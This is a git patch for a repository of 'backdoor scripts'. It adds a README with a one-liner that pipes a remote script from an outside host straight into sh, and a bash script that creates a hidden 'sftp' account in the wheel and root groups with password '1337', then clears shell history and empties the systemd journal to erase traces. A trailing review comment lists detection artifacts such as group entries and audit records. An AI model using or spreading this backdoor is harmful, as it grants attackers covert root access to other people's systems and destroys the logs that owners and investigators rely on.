From 38b0e3e339b188c99b8d08bf09ee8ecd6aec2c45 Mon Sep 17 00:00:00 2001
From: hornet
Date: Thu, 2 Jan 2025 01:56:00 +0500
Subject: [PATCH] first one yay!
---
 README.md | 10 +++++++++-
 service_user.sh | 12 ++++++++++++
 2 files changed, 21 insertions(+), 1 deletion(-)
 create mode 100755 service_user.sh
diff --git a/README.md b/README.md
index 4dc30f7..f0c569e 100644
--- a/README.md
+++ b/README.md
@@ -1,3 +1,11 @@
 # backdoors
 
-a collection of backdoor scripts i found/wrote myself
\ No newline at end of file
+a collection of backdoor scripts i found/wrote myself
+more sophisticated stuff coming in future, for now it's just a skiddie's trash bin
+
+## one-liners
+
+### service user backdoor:
+```
+curl -fsSL https://git.lainlounge.xyz/hornet/backdoors/service_user.sh | sh
+```
\ No newline at end of file
diff --git a/service_user.sh b/service_user.sh
new file mode 100755
index 0000000..7fe3519
--- /dev/null
+++ b/service_user.sh
@@ -0,0 +1,12 @@
+#!/bin/bash
+#extremely simple backdoor, expected to work on systemd/redhat-distros, can be found with a simple look into /etc/passwd file
+#change these to anything you want, to be "disguised" as a service user
+USER="sftp"
+GROUP="sftp"
+PASSWORD="1337"
+useradd -g $GROUP -G wheel,root $USER
+echo $PASSWORD | passwd --stdin $USER
+echo "done!"
+history -c
+journalctl --rotate
+journalctl --vacuum-size=1B
\ No newline at end of file
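Review bot: The header comment in the new service_user.sh names only /etc/passwd as the place this account can be found, and leaves out the other artifacts the script's own commands produce, which a reader studying this sample for detection needs. The `useradd -g $GROUP -G wheel,root $USER` line also adds the account to the wheel and root groups, so it appears in /etc/group, and where auditd is enabled the account creation and the `passwd --stdin` change are typically recorded as ADD_USER and USER_CHAUTHTOK events. The closing `journalctl --rotate` and `journalctl --vacuum-size=1B` act on the local journal only, so an abruptly empty journal is itself an indicator and records already forwarded off-host are not touched. I would extend the header with a comment such as `# artifacts: /etc/passwd and /etc/group (wheel,root) entries, audit ADD_USER/USER_CHAUTHTOK records, truncated local journal`.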